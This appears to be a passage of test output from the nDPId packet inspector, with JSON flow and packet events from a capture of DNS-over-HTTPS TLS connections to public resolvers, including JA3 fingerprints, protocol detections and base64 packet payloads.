{"version":"TLSv1.3","client_requested_server_name":"dns.digitale-gesellschaft.ch","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01589{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":946739304474,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":892,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":892,"pkt_l4_len":858,"thread_ts_msec":946739304474,"pkt":"ZmZmZmZmRERERERECABFAANu8ZFAADUG\/LG5X9oqCgAAAQG7xbYrbTJIao0RxFAYAfWPbQAAW0wo1H0j139pBXgBmTX+NlnQSaFEq5K3Pk3KVeGnXpOOLq4X08kQBuG8lGioiVe9QPOeM1XWvGxPlasRKFYrXBH86PGVaXAalDOEWJlV3PHRUUevw5fI6G+9XzuHkGZKTzPpIIOZ3iAzfHnVG3aTpqTBf7xHcc9kM1a8UHbmE4vJrXG9wa2HwWF2bcpsRjUYBUQxiid3MXG7FbSTEXHjqgO4LQdR6Xrrbq+Co3CdY49hyuqnRUiglv3ZkZvp\/BcnFskV9iJiOLBUK+jpAhnIdIbviFi78T5PQD4Tbyt8STzKJ4\/mkCRReunmywmmxKyYx8ErZcAkoKDR9IOJ3LCf8I8uzSUCcTKeSSnHS6ASYLDpWersQuLDgg3Is5Hb+2kMH37wQnKetidHgJqxmhLBaw+NX16ETkRc5vqPLeAmNQjzUjFZW029RGYPrEM\/M2aIcKp372plYpuhFsySXWIydCD9tqNCwZyquQ9nS3XV\/M4rQP8eJtxF8c+LbyHgf4cpoHUgBE4Qg\/rQ8QPjUfA1pwRPb\/2owpEEJi4RutXWP+JydB0D0ebOUJIyGUMSTIpJcFH2AKhLGUYE6NfckNeCzln4nEp2+qOXsbfMejtOZFyyhHVzHpRSbGA51CkajxcDAwEZGvKJBQnU\/r0Z9hIPhFlH3EC+7xZqS+s7+uQ2E96CDW5iU++SeFvwmMtUyG5rZZUMcBGpLzGamrlpIcWB85XVCU4gt4ssg9\/BdLmFwKiGqbmqVBGWt\/8gKtXdyHqS9eDrvNFNLvTrsxnC0XEzuTedB4Vu4WIaC7MUadYnyNgpkYSxjxFL6J71Xhm+92aoteroJN4zzFxDDd8rAkDnu1z+ZiBNnpB\/Gl8e1OMkCP6vsWHqZoCX9H9vn8tgHDIFyxXWqZDdxctsoUH7QrryxeYlvn1njblpv3w6tKj8ghJZAtQ3ko6UuvntUQvQpT48C+AbzDC+CMGpscAjbO2LKlP9fB1a9O37Dse31zOmm1FlQiiQCvlL1EpsgdEXAwMARSV8NSHQ2Cma7zLl9Np9i8ttiytzR2iGli71aKFmLcmNdXIXIfvH2D8Tx5IjanqSAuAMgykIOqh1u3rHE4swCwSQXoiMxQ=="} 
-00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304846,"flow_last_seen":946739304846,"flow_idle_time":7440000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":290,"midstream":1,"thread_ts_msec":946739304846,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.147.50","src_port":55962,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00851{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":946739304846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":344,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":344,"pkt_l4_len":310,"thread_ts_msec":946739304846,"pkt":"REREREREZmZmZmZmCABFAAFKCqJAAL0GKn8KAAABM56TMtqaAbsV\/EiYhf03fVAYAfaIyQAAFgMBAR0BAAEZAwMDM0zFcZBVaq8jarHhMnn706tDCSlU6qIcSdmbVQbksCDb4Qi2Yz\/q0+XeTvQ9QWQ6+8m8vlFJqWD30N7xMHe76AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACqAAAAGQAXAAAUcmVzb2x2ZXItZXUubGVsdXguZmkABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAgp73dM21LptFd0ThW7be4\/uwlUqgVJQtqqMQYrFbmEGQ="} 
-00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304846,"flow_last_seen":946739304846,"flow_idle_time":7440000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":290,"midstream":1,"thread_ts_msec":946739304846,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.147.50","src_port":55962,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"resolver-eu.lelux.fi","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -04708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":946739304885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":3185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3185,"pkt_l4_len":3151,"thread_ts_msec":946739304885,"pkt":"ZmZmZmZmRERERERECABFAAxjgA1AADcGL\/sznpMyCgAAAQG72pqF\/Td9FfxJulAYAfWT4gAAFgMDAHoCAAB2AwOQkeJmPgfI+2\/Nb2YFPwnrh6xqnBenx5u8q1ZnyWqFbyDb4Qi2Yz\/q0+XeTvQ9QWQ6+8m8vlFJqWD30N7xMHe76BMBAAAuACsAAgMEADMAJAAdACAildRAk\/Ii9q568Shy0jK1lY4Sb1nfErCeFDdP5ao6KBQDAwABARcDAwAkQtxzjO6Y1fKC\/+pxVLm\/ix+V3OPJ68RUn+6KLdAjN0rm7jqVFwMDCjCAB4dDMRsvk08LXpiehq\/g9vbt8WAZZyX0IwUW7zm2s2JxksqGXN7MA4aQXMsXbea79jo4WvO3p6dz8ckR6\/GSVEFX2o1gGE3SmFE8bI1yIk7FWs3aYgxYwqLKQEvbN1ogdjJ6GVf+z5kiMwtt12G5tdTf7rSfZ3NH6Yk4oM8Elpl9VtGpp2o0FPfY8QB0bMd4GPEVRd4k3sqTgevSs5A\/CC4vXXDNw8uBoNAhPcBJ041jkXgJVSYm9QwFsJI4LdQTSOvpWGu8g3Q7\/FqYiPFofKEmMJ\/qdjv4rC472QK9MBOUQREh1M+X1zwZya0Ac0YwCKyp0B6QV8x8ZfPc4YWcPVw\/CzcsYjigSbp5JV0L4gyAue9
Gh6S3YYS9bSWcQ6OYfhcUgIVrottiHisZ3rFZLnhHY2SXkUzy2eOnD3Qi87\/nZ2OjGdHVYvM8Yu4DBGax+k0RD3dyn9+WKeU6QKdkf0bt\/mxpZ+gCW+joqGHWhH8T8mliVYu97Vp1QkdwgpRB7hXYN0Y6CGFsBPw4pzAHjVBFBgDGgx3FLp+jHtYGS4QJXS1JHRsP\/ek1Bjr6PmHXQaaRrJ7LWjgQKI7Gha0EZqsq38SOF+eicMwDFpzc3B+5eNIjmjJW4NSel0FytKTt9ojc0NWkn0EYaG0EgY6+6x2nvzg5YX9tM13wZT\/oz2Ot9pPHCaabuHca2dbfesbpNetZkot4ox97XYVrqgngmst1PfSQmtM98M5ptnPmd\/sO4Q2zmY5zCyE4gqZJ\/jBMttfXco2\/5avcH7mX5ejSI27aNnLJexzSKXQ+JaOKITzvIhr9MApYef8a6mxmBG7KvaOHtWpBt2xvsdwkyGKaTSFivERAQJ3qVVpBnDVBNegKy8yEp45YgbraKILphly37eCzmeR8+BDQHM0\/olAhROBUZh\/RONZXvUkl5SKTRjHC2xvJNaeZYZ+hmdzytY6JxtjOWIkXJWGOQ1NLnp8ApIWyE\/uNNjzCwSksu7oipiMjp9\/TYKv3dTCD+5Ol7BQVVV99RWf0LzZ8iQzJsQx4OWgFzyT+Rx7ZVNnTGOrqRbAycjVipQHP7zlio12QWc9UNzJCxesOye7ivdDzyOxpzywnD3v8hSp\/9zPmf\/3ENHJgy8O34UUO06MOahgiokayYgWdjmVbemjxT1TryYu0gDna\/E6EV3qm9EmJk3uwiz6F8MD8T978R+EclF8jScCvS+0rc0myMoeeGSKvHZ59\/bY\/8uMlpK\/glxn4tf2FrEjMiwTYfD\/iCofxemvMkvC\/JJfgLtIuT4eRwYnzHY6tx9RKYdE3USzn4\/mm5qo5iJNIvjNV0kDlflg2at\/H0LoUPuAQDzKEIijJENcZ6pth1tAfPuzZbqzQybao7+N7tXszvfJs6XQ8U0IN8EKUruqqe63LmjAuODDmoGi5l1XKUHloz2N6Z0c6GOIMVwe3VD3oKEzis5\/IqukPTBIlPi3wM9hPvIjDsgqHeQuZwd0P2uGkmxxX+CQ\/eHLZcMkC6yXGIsoms\/DqqMmKImF+\/kg3KVbsOWynlp+qs+GRnuEe5Gwcck3bNanvNfRO2hnDlR3xxWpDeCDtY554dnKSdrEsmz56E3HZY7CS4xffa2qaRU9o8FE6oWceQ2YomJuE\/bMT3knxqniPrzl1K3GkigMh9J1i47zylUFJIasxWeeT4rnsrPdwO5pPpDZPDAhZZKqamf0Xxf7UyzOur5bQ0RGdSbDmjCGZUxwrcQgCzOocJ07C3y9f5\/cPHLy4Hcpi9nKHy5+zMgLxDuHh45d7g5aX2opBYeDFdZVkS35fhN\/VA5YDY3hjQkRRPMbthZpOOEiiUTiyQGuttf7SmNH1qqd0+P4R98lk6wmtu\/RYPzzoAOrY33Oweyfv45FrUJjxFb3dkB2JJBL+a3b7QXiEHk+jfi2DFJC8R1nDmEiD7lG0zp+GgCp2hMKrzTinc3jq7XrvSXgjRArW5vMll4UVtkgCZOG8JOPCJ+1InS6ZkzsHBlVE1ulhcQ6O07QOIetMX\/TQcpOws1Y3zI6xlDo7QN9RXjghTw1OQy\/e7csIpoqCDP+zQIn4uVNd9knXoZalNv0Vl+aMYpSUZU7SqXuPd5TrgUjyDCp5uSeJ7PvFxTrvq2m\/J4PCA00dz61blph4TnR5jqkjnWkPCWysgjmFP6jSXDVhi7OEYKJ3O5rj9s1KlWrTAKqEQ1WqkKpYs5zhjZX8C2jJXc7kR7CLzfiUXF\/NgCKD1oPTUZ3B8\/5yhnRignY4ZXMdGmmpuO\/YtIw9z3hTG2mvGzyDH+lTissPE7qvJQZpSJa3YSyfqgptZgRRY3rqQwM1
Uan0WZB\/VyeZi71E8HGjmCdytjr1tbuT47siLcnpw\/tnXbVcW0DRQa0UluCuUeRWsFfgTuUhjuWHPeilVqW8TKVGxmd00ikgPoQa60hulHvmRZ5KO6vzi71RXX6dL\/wcA9t7hqc08oZMCG7pFOGbkwZ0H2Ou1cGKyFuTh2P28nKV1VsXeJy03j0rMepvwRePH7BjQM109D5zTvZ+x9U7LeeU5p\/97XLGVSvHyU6QoAkvI7FvvpHkTyoqhk2wuau1Ks3W6ziSuG5ItHrlZeoz2vdhzoVB+PdecdxLzV339b9A3nHa+rng\/3RfrU7m\/xV1uGOltE\/q6T8zbMwllfgMWQHWJtalokkS691O3vXWaxSb0GH3Eukn2GTLqT7xyn8hsg3I5F5pOCMspm6GHKCedNXQt\/rOrbG+70oNkLEiqOTucHrzdm7u3q9vZm5H7InHwwhmYB9o+wmMx9CpSsan17Eu6kQzONsC+k776iKm10F9TFCFRzcFvoSkJVRCogWUna5X6unZPh90yhZj+joK9OmDYl3uGf3cxeeYhuWr7BFipgMV88P5BfhbMuQJTiRkmE2tdVLKXiJJMT3RIuLttxViwKIZxqrsBPVZWuFgeoB\/tNKx1MPoFMSkd6Ady\/JPiKCd\/Lo+LSa+EGciXu3JhsD37LOO\/iaE1hxwYGWesFtcRBD82I4gt\/VZ4IZMSaNKHgm65E6lCcq41BJ\/gbuCDCFJ47l5UE8QhYSOHmp5J9j5vA1FjZFm5Iv6VRZaegnWKKRCmp+e5pBYWdf4T92iFA3wkmAojnbzcZPXM1FL7vahyaLx6fEfTzbYntPyfIJ2l5KJE855FQl1WRsib7X80Yvtknk5W4cHEv1yr1kjUU2CGJ8WMhJhi5rps9ncDKvd4PP0dTrH0ia8H78o1K4OYwHp0nPI0tpDBJqSO906qPhy7pON78NLR8NLi7ebyinTbjqYrIeAPW0BcPQXfo+ePTRQEGlW7G5LCAYlQCvO5j\/LMgF9c3iJwt3nUbOE+eqHvK0\/PHJmQK+ijLfXFLdBd6NBQSn3sHF\/qzgQRE5VwfSRmK55bFmg0PCiTnhGTWzfK0OvOvyyAAiwvXCaBV+gFnzKnwwQ+4ebBmLMgQpqYGGOrzwhV7P+RvbAFwMDARmYqpARsWX06T7\/aIqUa3gqpszdt6QdkNXpjrjP\/CtX9C+2AHbAmlDaq+eynMum8sDVzFoKFvQfGpt91s0+c4BcfaWSQDicP6abNOaMq+Hp75lMfIATEOyO9cUpGtsxdjbO98fR3ligfvynTicYTBBKOabjGzsvGqpIQNsc6yP7ec1DM5IvytEF3WMD\/BSWfSyCMBkPc77J1iCDteQqYtaAe0whPDVMG6GGDORujY8TM3L19IZL3YvYjw7AjSCmeKp+dThVSFL7D\/ks2Bt12v6Pc4J\/bL1kxAzO4vYx1vazs5rxcAfFBrI00UuE4UKrW1AuFrQrWAmy8gFVgJ7l+nCzCeDoyrV14OgMNuqUXIpirZiejq2fhnoXshcDAwA1MiDkD+m6EfUtBdx\/Pyl0ehgKaB76+ayZoBt6uEP7tnUDn+hUUsmcN7NZ1IZhFxhyx2uKd6w="} 
-00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739304846,"flow_last_seen":946739304885,"flow_idle_time":7440000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":3131,"flow_tot_l4_payload_len":3421,"flow_avg_l4_payload_len":1710,"midstream":1,"thread_ts_msec":946739304885,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.147.50","src_port":55962,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"resolver-eu.lelux.fi","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":946739304887,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":946739304887,"pkt":"REREREREZmZmZmZmCABFAABoCqRAAL0GK18KAAABM56TMtqaAbsV\/Em6hf1DuFAYAfWH5wAAFAMDAAEBFwMDADVGrMk33Jx9u4V9oT8gk9T3N9siooKVMszOs96zlvjMst5cKF\/6mDE\/X3tfb1uyKq+NLUpVEQ=="} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305016,"flow_last_seen":946739305016,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739305016,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":59404,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":946739305016,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739305016,"pkt":"REREREREZmZmZmZmCABFAAFIJYRAAL0Ggi8KAAABuf2aQugMAbv\/W2fgE34PaFAYAfYWNwAAFgMBARsBAAEXAwO7rF9fivBYq0PPnnVftpI5xv63Wth8iDXYIbCI66xBbCCVvQ4J9sHqcW\/KB2T6FVper40CtcJE9we9duJ2lwo5jAAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASZG5zZXMuYWxla2JlcmcubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIHdlaU8VTQtoxOo631cPtMLo1fhD\/NP8\/WHh2FCfWmp6"} 
-00909{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305016,"flow_last_seen":946739305016,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739305016,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":59404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dnses.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -04400{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":946739305061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739305061,"pkt":"ZmZmZmZmRERERERECABFAAuA+UlAADkGKDK5\/ZpCCgAAAQG76AwTfg9o\/1tpAFAQAIMgbwAAFgMDAHoCAAB2AwNWoPreEkJ\/UPiZCRV0IEx6jRSqugqY3M+B37V87ydZxyCVvQ4J9sHqcW\/KB2T6FVper40CtcJE9we9duJ2lwo5jBMBAAAuADMAJAAdACB0RVn8jGqUM9fyfUTkTuhvHxWfPva1vJ9a18\/+TyUNbgArAAIDBBQDAwABARcDAwteuwCVRbAjw9pKtY4dNJzB+NkDPzUPU\/YSrAhwNpHIEK5V+o2\/HqZHUFxtVJbEBPgURU0pRFWa9dL9lQp8LuDwWHwDq1H1B4wIu6Cjn5BK872nUeQltRw5+FbrO5MDeZZJRgg48HKHnsK1mBHQnXLVwFvBE\/e\/UwSrANn9vg+B6zkss+nwjnEuw1XfKHcjr3B+gq7Tt\/pkx\/SEVt9DDhoVQjkT+nj8Ch6uFvKMxBfoNlGXQAfQ76Cfus9zBAZT5EY1YHp8kypEbWJsqWobkhk3j7efutg\/+7i\/\/3hwY3S4DA+PZFxsrSsM6AIVwaJ95fOH1dRdOyCRxbfVQ1s5uNDJcA7OdsaNR8VQ06UA5uK3FnFY9IaeCSIuzswKtKKP\/cTlEabfxoFlZbInteiv8UhvUx14oYH8877iKbTHau
ga0SrPYwJ3hDQ38FuPBJ16hIcickFsAxoIxHcrJTcDxD31\/+27P70ucqJUKNnKmwnMS5iCjU275dZeWQ9Zr0T4s7GAOpJ\/qhuQ0adCzilfe+zxessB1BHzKqNpomqUeAJU6wiiIZGwIQCSR9TnB+R6Furn+4OgUG6PGNdXCZNQ9itsUGoaOah9Fd+b\/mJSMoK\/FuhgIcCIxvGAml0OlSPbxxyIuGAWgYtRBimB3o6JaqY5BlDiRDxZX24w4nNBhNEgZ23H2qCY1hFOw\/NxAIqZ6i1OczcdQK5je4mFGQnk7n2Dd0xCvT\/QbVT+DGwohNzMpmrD81sKP2YRMryNcEXaCYgEk0oi4bjQNtHjwEi3WiSTxdHtROjzPbx1MuktYL6gASggOg1Ub+v8yVRI6bLdeV5Xwvz5ZxoF9vdrBEyvVBdMauaRYoyVnXm15LfrTPUCeXkHS1kWpj909RBaupD8tKI35AMNBM63GiCNIPCKacZOle5IpXYl1uAfPyEf7I7c\/Z2VAGWif0f1eRsudqghQ1VDSbMFMSOUlZF8oqR69Dp+GUrZSkzXH\/vlToVdum7PDCHkza\/W9cBDPI5wtxaPFdq19aD9CF4UXzcnY86h4hX1BAKMl5ymvY9oQmQKwLyZZk7gJ3BG3QSRRkEJLHmElRTA\/j6+UD2DUirljLXPFbrXC2eKn2CCwq3Zuv5P5wO5+t0UU\/yghFoQluNjQ3lfw4zQuwuXqm940OzzyqoEcUuHVR8IXnZ8TZqE90q8rCtGIOP+LD4hWpqBqHuwk66vMcJQgwNCFXix5ZnSXLN0BgV30sQI8N\/4QNcrVg18QrqrwMX5353ArFRERLIaGuZFxOud2tKJXNi7\/8bnQL4pfggVMDHzys0Vv2kSkmMM9AH5fy6is33XJQsCiLeVAW2BJv0HWG\/2v54ftufeuJKqjAweFaFpf8nOnSzUujidt2Hj6vD7NzSy9u5bVuAiVU8CLsOjLUQDZZwuXq5KPOpcqPkwUfO\/JhY2IYSty68WbtoEQ\/LicI5G0k7qhGVYDDLZjTT029eOEYuXI7f+lB6Kb+6SLaMGDm8r9Mw7ebinM16XyWOwJ5JBUayf+vtez432JNrnbq1SGS5rLH5Fg5ZMgKUFbGPULmfIDV2jwsa5no0weJKoBPHSF0j2z2Ws3ZeYohMSNwPof+eIkWPeDsS0odMH3bOI8vjnmbAlt1LEuTlP9Bgfbe4EZBkTArblnr1PduSYp9HHqPcDcdegoFu3tk12XJWCeAczLwMdcKTivhfzRMPv6R\/QbwvNULNcqw3kjep\/lhPa8MK5fd2CGyIw+LCWxGXv+q\/ds\/TSYSN0doo9wcXYWwj8LntYcpK6i8bE1mnU9HhfDXOdgKZheyUxq\/2aHTotcU7hlwJGxzG1S8L2XOL+e5cK\/uWYrHMSCsilBLjzbaE58\/UhgQTo4G7REl65txB7jkxytOXC2V8igiA\/VVPL1iSyOqszjZhZj\/KQ7cRXbuiY2hUvh3d1GHeunUPxkjVr7SBFLwo5npluN5uAfc+7Lx2v8sh\/0AXjRBQzrzXUGOKzmSDk4EsluiAOjG78HzOAmharQORiNXCoRaRa+fhf0Ejafe7HoDuKqj5ukCKAbsCU6se\/uViDv0Ko0frloNjTZWVHeFLAU\/8Rxbf5R8lMV480rpPEWmLytLklZol4xviBgu3uvWIUzW30atpHjpq+x1y1B4ZeqEOMO83R7O6ddmc3f06vtoo06tW\/Agu9h766pQvpNm2vTYudTnd6DSqBlKI5KeonXz4AxZiEG5DKNiVkur+pxwlM3ugAjT44z5C6NIq2xLtYBKvjI4ZiVK+oThODcy5mgGaurXo21aX3cTizFa3bH6OPqttL9gjP05Bka27HY2jgRwKVSbziiMro9AX8Xsmg6S2yWOPjJLfqZCcbtLmpaNGvdFtOkH77j4F52qkt+me41p1UftUvN6wiw
xxp99NI0\/fMosQgl7ighWoY2W\/IB0fXHatEvBsmPr1KEj7P+aJaj7oNVmyRVuFHPwaBwwi7T8Vvj9wG3gSDuuYdP5+UFDM+35GxMSRkihqY1Nf52lvDc2vDx7TdolcUJnmrezHB7iOplwsA\/pnoSxDqDzY8u2hWCRC+c4jg1z3vL2zvzGplrkFak387ZT7iXl569hRQY0g6W72J\/qU\/wWvKrh5aic7Fca9+09fN8mKvizdcBFS1tmo5ud9hSP5IApLh\/AqNGAsSvFB77AMVMPcqCZqs\/LzhQ6p8mk1Ztud+POMwqvs7eCTrsyIwvCFHr3MjxRECobkoOUnKuDn6O2Ba4MeFaOtHE1XjJdkhICNgy76FwlNk7qa2miONerIZrFWrQmU2yx1Al5ihAv+BSYo7OLYt9zXUcCSntdFwaG5iWvn2D3TqvQcyGsX7n8R8YOUmBL+xEDz8\/cHI76eHoMT9Gcmgev3Cz2de\/7ilgKsoMsC9dl+Ldtg+QDnuzeji5lROtOH+fv+MRICCWa3t+oaVa2XgjAhIywmeaAGP7+W10HhLqbtIimjrrdbxpeltnnJv0HxLov9cXj+b0Pm2tBSSGlhGmiCqLRib5vepRDq5ASTdoFYCIMH422KVZztJ1b63ltyCjG5NtOVaK\/MkO7\/KWS1XPbQXAVUScApoXkKlzQiVxTCMZQoZIoE4pH0+fjzQcElC405f+pmLRfF1iVpdbRwPdWdjvokVy8bVGY3GGXVtgS7DasELvMxZruoBcMEH12JcU31nt00epqRaM7Ty\/hGPJ9RgbFIN6nscoLHLm6YFkdOMqn+3D0CMvB4x652Bu8PF5m7DHJMIBJSoh\/WEUOZDxlHi5CT9KYRNTMZDhIkJj++9o8TtwBf\/+FOKgQZYlLc9emRrICiIhqz7dIu9M1nNq8igrwodBBqfV3IJasHHoy\/F57WNpO6ufh54oPFaVKYJn1bg656yNokeiXMSkMhJsmjb0+SAmQ0rTBRRWtbjoeZCc3gkigutNXY3WNHxKSc5xsJ9iyr3gTZdRpWgWbT+isP5Ovqam4GzSglt\/k+unyjMz4\/f8vVi\/7W288anM52u2gAT5Id3RGTrtEQDPQ8UVftSrylfoNAZTKGGhUJLAcmefkYZfUt\/EB+t1\/S5DOAvsgdK0URdbVybob0RmFJKIBsQ7DYRwD\/HgqXJ6uMDVUKO9XoO+9dwhRf11sqhooAzPCeXtVLggV615qXldaBtBjJ4Fa\/LAamnbZck+pr1D1RAPJP4HQwfBLL\/eWmzwOCA4y+tqnSn"} -00951{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739305016,"flow_last_seen":946739305061,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3192,"flow_avg_l4_payload_len":1596,"midstream":1,"thread_ts_msec":946739305061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":59404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"dnses.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":946739305063,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":946739305063,"pkt":"ZmZmZmZmRERERERECABFAAC4+UtAADkGMvi5\/ZpCCgAAAQG76AwTfhrA\/1tpAFAYAIPkeAAA4ov2OS2FYwHLyLK8HvldhjW58oZhz\/dEDG0qRvP07Xrr9KbrwFzXsPAENpwnRYTilEXtuGTXfjP8+51dqVC3h3Voz6vzPB2E1qN7598iQNHjvdaBjrZ71M3dNmhXs0fudaDBYxVH3HnrCgr\/VoLnr9AAImTV5ybiMJS9e3W0V7h9Z35p6EhyTXdDS8\/1x5Ew"} 